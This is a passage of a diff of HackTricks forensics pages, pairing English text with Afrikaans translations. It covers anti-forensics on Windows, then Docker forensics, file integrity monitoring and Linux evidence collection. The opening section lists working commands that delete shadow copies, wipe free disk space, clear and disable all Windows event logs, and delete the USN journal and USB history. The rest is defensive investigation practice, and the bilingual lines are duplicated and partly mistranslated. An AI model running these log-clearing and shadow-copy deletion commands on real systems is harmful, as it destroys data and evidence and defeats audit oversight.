Jy kan ook die hulpmiddel [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) gebruik om seker te maak dat jy hulle verwyder het (en om hulle te verwyder).
All the **USB Device Entries** are stored in Windows Registry Under the **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device into your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\
You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to be sure you have deleted them (and to delete them).
'n Ander lêer wat inligting oor die USB's stoor, is die lêer `setupapi.dev.log` binne `C:\Windows\INF`. Dit moet ook verwyder word.
Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted.
## Deaktiveer Skaduwee Kopieë
## Disable Shadow Copies
**Lys** skaduwee kopieë met `vssadmin list shadowstorage`\
**Verwyder** hulle deur `vssadmin delete shadow` uit te voer
**List** shadow copies with `vssadmin list shadowstorage`\
**Delete** them running `vssadmin delete shadow`
Jy kan hulle ook via die GUI verwyder deur die stappe te volg wat voorgestel word in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html)
You can also delete them via GUI following the steps proposed in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html)
Om skaduwee kopieë te deaktiveer [stappe vanaf hier](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
To disable shadow copies [steps from here](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
1. Maak die Dienste-program oop deur "dienste" in die tekssoekkasie in te tik nadat jy op die Windows-beginknoppie geklik het.
2. Vind "Volume Shadow Copy" in die lys, kies dit, en kry toegang tot Eienskappe deur regs te klik.
3. Kies "Gedeaktiveer" uit die "Beginsoort" keuselys, en bevestig dan die verandering deur op Toepas en OK te klik.
1. Open the Services program by typing "services" into the text search box after clicking the Windows start button.
2. From the list, find "Volume Shadow Copy", select it, and then access Properties by right-clicking.
3. Choose Disabled from the "Startup type" drop-down menu, and then confirm the change by clicking Apply and OK.
Dit is ook moontlik om die konfigurasie te wysig van watter lêers in die skaduwee kopie gekopieer gaan word in die register `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
## Oorskryf verwyderde lêers
## Overwrite deleted files
* Jy kan 'n **Windows-hulpmiddel** gebruik: `cipher /w:C` Dit sal cipher aandui om enige data van die beskikbare ongebruikte skyfspasie binne die C-aandryf te verwyder.
* Jy kan ook hulpmiddels soos [**Eraser**](https://eraser.heidi.ie) gebruik
* You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive.
* You can also use tools like [**Eraser**](https://eraser.heidi.ie)
## Verwyder Windows-gebeurtenislogboeke
## Delete Windows event logs
* Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log"
* Windows + R --> eventvwr.msc --> Brei "Windows-logboeke" uit --> Regskliek op elke kategorie en kies "Logboek skoonmaak"
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
## Disable Windows event logs
## Deaktiveer Windows-gebeurtenislogboeke
* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
* Inside the services section disable the service "Windows Event Log"
* `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl`
* Deaktiveer die diens "Windows Event Log" binne die dienste-afdeling
* `WEvtUtil.exec clear-log` of `WEvtUtil.exe cl`
## Disable $UsnJrnl
## Deaktiveer $UsnJrnl
* `fsutil usn deletejournal /d c:`
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

100
forensics/basic-forensic-methodology/docker-forensics.md
View file

@ -1,31 +1,28 @@
# Docker Forensics
# Docker Forensika
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Container modification
There are suspicions that some docker container was compromised:
## Houer-wysiging
Daar is vermoedens dat 'n sekere Docker-houer gekompromitteer is:
```bash
docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress
```
You can easily **find the modifications done to this container with regards to the image** with:
Jy kan maklik **die wysigings wat aan hierdie houer gedoen is met betrekking tot die prent** vind met:
```bash
docker diff wordpress
C /var
@ -39,70 +36,52 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI
A /var/lib/mysql/mysql/general_log.CSV
...
```
In the previous command **C** means **Changed** and **A,** **Added**.\
If you find that some interesting file like `/etc/shadow` was modified you can download it from the container to check for malicious activity with:
In die vorige opdrag beteken **C** **Veranderd** en **A,** **Bygevoeg**.\
As jy vind dat 'n interessante lêer soos `/etc/shadow` gewysig is, kan jy dit van die houer aflaai om vir skadelike aktiwiteit te ondersoek met:
```bash
docker cp wordpress:/etc/shadow.
```
You can also **compare it with the original one** running a new container and extracting the file from it:
Jy kan dit ook **vergelyk met die oorspronklike een** deur 'n nuwe houer te hardloop en die lêer daaruit te onttrek:
```bash
docker run -d lamp-wordpress
docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
diff original_shadow shadow
```
If you find that **some suspicious file was added** you can access the container and check it:
As jy vind dat **'n verdagte lêer bygevoeg is**, kan jy toegang verkry tot die houer en dit nagaan:
```bash
docker exec -it wordpress bash
```
## Beeldwysigings
## Images modifications
When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**:
Wanneer jy 'n uitgevoerde docker-beeld (waarskynlik in `.tar`-formaat) ontvang, kan jy [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) gebruik om 'n opsomming van die wysigings te **onttrek**:
```bash
docker save <image> > image.tar #Export the image to a .tar file
container-diff analyze -t sizelayer image.tar
container-diff analyze -t history image.tar
container-diff analyze -t metadata image.tar
```
Then, you can **decompress** the image and **access the blobs** to search for suspicious files you may have found in the changes history:
Dan kan jy die prentjie **ontplooi** en **toegang verkry tot die blobs** om te soek na verdagte lêers wat jy dalk in die veranderingsgeskiedenis gevind het:
```bash
tar -xf image.tar
```
### Basiese Analise
### Basic Analysis
You can get **basic information** from the image running:
Jy kan **basiese inligting** kry van die lopende prentjie:
```bash
docker inspect <image>
docker inspect <image>
```
You can also get a summary **history of changes** with:
Jy kan ook 'n opsomming van die **geskiedenis van veranderinge** kry met:
```bash
docker history --no-trunc <image>
```
You can also generate a **dockerfile from an image** with:
Jy kan ook 'n **dockerfile van 'n prentjie** genereer met:
```bash
alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
```
### Duik
### Dive
In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
Om bygevoegde/gewysigde lêers in Docker-beelde te vind, kan jy ook die [**duik**](https://github.com/wagoodman/dive) (laai dit af vanaf [**vrystellings**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) nut gebruik:
```bash
#First you need to load the image in your docker repo
sudo docker load < image.tar 1
@ -111,33 +90,30 @@ Loaded image: flask:latest
#And then open it with dive:
sudo dive flask:latest
```
Dit stel jou in staat om **deur die verskillende blobs van Docker-beelde te blaai** en te kyk watter lêers gewysig/toegevoeg is. **Rooi** beteken toegevoeg en **geel** beteken gewysig. Gebruik **tab** om na die ander aansig te skuif en **spasie** om vouers in/uit te vou.
This allows you to **navigate through the different blobs of docker images** and check which files were modified/added. **Red** means added and **yellow** means modified. Use **tab** to move to the other view and **space** to collapse/open folders.
With die you won't be able to access the content of the different stages of the image. To do so you will need to **decompress each layer and access it**.\
You can decompress all the layers from an image from the directory where the image was decompressed executing:
Met die sal jy nie toegang tot die inhoud van die verskillende fases van die beeld hê nie. Om dit te doen, sal jy elke laag moet dekomprimeer en toegang daartoe hê.\
Jy kan al die lae van 'n beeld dekomprimeer vanuit die gids waar die beeld gedekomprimeer is deur die volgende uit te voer:
```bash
tar -xf image.tar
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
```
## Legitieme inligting uit geheue
## Credentials from memory
Let daarop dat wanneer jy 'n docker-houer binne 'n gasheer uitvoer, **kan jy die prosesse wat op die houer loop vanaf die gasheer sien** deur eenvoudig `ps -ef` uit te voer.
Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef`
Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory).
Daarom kan jy (as root) **die geheue van die prosesse uit die gasheer dump** en soek na **legitieme inligting** net [**soos in die volgende voorbeeld**](../../linux-hardening/privilege-escalation/#process-memory).
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil hê jou **maatskappy geadverteer moet word in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

50
forensics/basic-forensic-methodology/file-integrity-monitoring.md
View file

@ -1,56 +1,52 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
# Baseline
A baseline consists of taking a snapshot of certain parts of a system to **compare it with a future status to highlight changes**.
'n Baselyn bestaan uit die neem van 'n oorsig van sekere dele van 'n stelsel om dit met 'n toekomstige status te **vergelyk om veranderinge te beklemtoon**.
For example, you can calculate and store the hash of each file of the filesystem to be able to find out which files were modified.\
This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all.
Byvoorbeeld, jy kan die has van elke lêer in die lêersisteem bereken en stoor om uit te vind watter lêers gewysig is.\
Dit kan ook gedoen word met die gebruikersrekeninge wat geskep is, prosesse wat loop, dienste wat loop en enige ander ding wat nie baie of glad nie moet verander nie.
## File Integrity Monitoring
## Lêerintegriteitsmonitering
File Integrity Monitoring (FIM) is a critical security technique that protects IT environments and data by tracking changes in files. It involves two key steps:
Lêerintegriteitsmonitering (FIM) is 'n kritieke sekuriteitstegniek wat IT-omgewings en data beskerm deur veranderinge in lêers te volg. Dit behels twee sleutelstappe:
1. **Baseline Comparison:** Establish a baseline using file attributes or cryptographic checksums (like MD5 or SHA-2) for future comparisons to detect modifications.
2. **Real-Time Change Notification:** Get instant alerts when files are accessed or altered, typically through OS kernel extensions.
1. **Baselynvergelyking:** Stel 'n baselyn vas deur lêereienskappe of kriptografiese kontrolesomme (soos MD5 of SHA-2) te gebruik vir toekomstige vergelykings om wysigings op te spoor.
2. **Real-Time Veranderingskennisgewing:** Kry onmiddellike waarskuwings wanneer lêers geopen of gewysig word, tipies deur bedryfstelsel-kerneluitbreidings.
## Tools
## Gereedskap
* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
## References
## Verwysings
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

405
forensics/basic-forensic-methodology/linux-forensics.md
View file

@ -1,40 +1,36 @@
# Linux Forensics
# Linux Forensika
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
Kry vandag toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
</details>
## Initial Information Gathering
## Aanvanklike Inligting Versameling
### Basic Information
First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USB, and modify the env variables to use those binaries:
### Basiese Inligting
Eerstens word dit aanbeveel om 'n **USB** te hê met **bekende goeie binêre en biblioteke daarop** (jy kan net Ubuntu kry en die _/bin_, _/sbin_, _/lib,_ en _/lib64_ lêers kopieer), monteer dan die USB en wysig die omgewingsveranderlikes om daardie binêre te gebruik:
```bash
export PATH=/mnt/usb/bin:/mnt/usb/sbin
export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64
```
Once you have configured the system to use good and known binaries you can start **extracting some basic information**:
Sodra jy die stelsel gekonfigureer het om goeie en bekende binaire lêers te gebruik, kan jy begin met die **onttrekking van basiese inligting**:
```bash
date #Date and time (Clock may be skewed, Might be at a different timezone)
uname -a #OS info
@ -52,51 +48,47 @@ cat /etc/passwd #Unexpected data?
cat /etc/shadow #Unexpected data?
find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory
```
#### Verdagte inligting
#### Suspicious information
Terwyl jy die basiese inligting bekom, moet jy kyk vir vreemde dinge soos:
While obtaining the basic information you should check for weird things like:
* **Root prosesse** loop gewoonlik met lae PIDS, so as jy 'n root proses vind met 'n groot PID, kan jy vermoed
* Kyk na **geregistreerde aanmeldings** van gebruikers sonder 'n skulp binne `/etc/passwd`
* Kyk vir **wagwoordhasings** binne `/etc/shadow` vir gebruikers sonder 'n skulp
* **Root processes** usually run with low PIDS, so if you find a root process with a big PID you may suspect
* Check **registered logins** of users without a shell inside `/etc/passwd`
* Check for **password hashes** inside `/etc/shadow` for users without a shell
### Geheue Dump
### Memory Dump
To obtain the memory of the running system, it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\
To **compile** it, you need to use the **same kernel** that the victim machine is using.
Om die geheue van die lopende stelsel te verkry, word dit aanbeveel om [**LiME**](https://github.com/504ensicsLabs/LiME) te gebruik.\
Om dit te **kompileer**, moet jy dieselfde kernel gebruik as die slagoffer se masjien.
{% hint style="info" %}
Remember that you **cannot install LiME or any other thing** in the victim machine as it will make several changes to it
Onthou dat jy **nie LiME of enige ander ding** op die slagoffer se masjien kan installeer nie, aangesien dit verskeie veranderinge daaraan sal maak.
{% endhint %}
So, if you have an identical version of Ubuntu you can use `apt-get install lime-forensics-dkms`\
In other cases, you need to download [**LiME**](https://github.com/504ensicsLabs/LiME) from github and compile it with correct kernel headers. To **obtain the exact kernel headers** of the victim machine, you can just **copy the directory** `/lib/modules/<kernel version>` to your machine, and then **compile** LiME using them:
As jy 'n identiese weergawe van Ubuntu het, kan jy `apt-get install lime-forensics-dkms` gebruik.\
In ander gevalle moet jy [**LiME**](https://github.com/504ensicsLabs/LiME) van GitHub aflaai en dit met die korrekte kernelkoppele kompilleer. Om die presiese kernelkoppele van die slagoffer se masjien te verkry, kan jy eenvoudig die gids `/lib/modules/<kernel weergawe>` na jou masjien kopieer en dan LiME daarmee kompilleer:
```bash
make -C /lib/modules/<kernel version>/build M=$PWD
sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime"
```
LiME ondersteun 3 **formate**:
LiME supports 3 **formats**:
* Roh (elke segment saamgevoeg)
* Gepad (soortgelyk aan roh, maar met nulle in die regterbits)
* Lime (aanbevole formaat met metadata)
* Raw (every segment concatenated together)
* Padded (same as raw, but with zeroes in right bits)
* Lime (recommended format with metadata
LiME kan ook gebruik word om die dump **via die netwerk te stuur** in plaas daarvan om dit op die stelsel te stoor deur iets soos te gebruik: `path=tcp:4444`
LiME can also be used to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444`
### Skyskaping
### Disk Imaging
#### Afskakeling
#### Shutting down
Eerstens, sal jy die stelsel moet **afskaal**. Dit is nie altyd 'n opsie nie, aangesien die stelsel soms 'n produksieserver kan wees wat die maatskappy nie kan bekostig om af te skaal nie.\
Daar is **2 maniere** om die stelsel af te skaal, 'n **normale afskakeling** en 'n **"trek die prop uit" afskakeling**. Die eerste een sal die **prosesse toelaat om soos gewoonlik te beëindig** en die **lêersisteem** om **gelyk te maak**, maar dit sal ook die moontlike **malware** toelaat om **bewyse te vernietig**. Die "trek die prop uit" benadering mag 'n **sekere verlies van inligting** meebring (nie baie van die inligting gaan verlore gaan nie aangesien ons reeds 'n beeld van die geheue geneem het nie) en die **malware sal geen geleentheid hê** om iets daaraan te doen nie. Daarom, as jy **vermoed** dat daar 'n **malware** mag wees, voer net die **`sync`** **opdrag** op die stelsel uit en trek die prop uit.
First of all, you will need to **shut down the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shut down.\
There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but it will also allow the possible **malware** to **destroy evidence**. The "pull the plug" approach may carry **some information loss** (not much of the info is going to be lost as we already took an image of the memory ) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug.
#### Taking an image of the disk
It's important to note that **before connecting your computer to anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying any information.
#### Neem 'n beeld van die skyf
Dit is belangrik om daarop te let dat **voordat jy jou rekenaar aan iets wat met die saak verband hou, koppel**, jy moet seker maak dat dit as **alleen-lees** gemonteer gaan word om enige inligting te verander.
```bash
#Create a raw copy of the disk
dd if=<subject device> of=<image file> bs=512
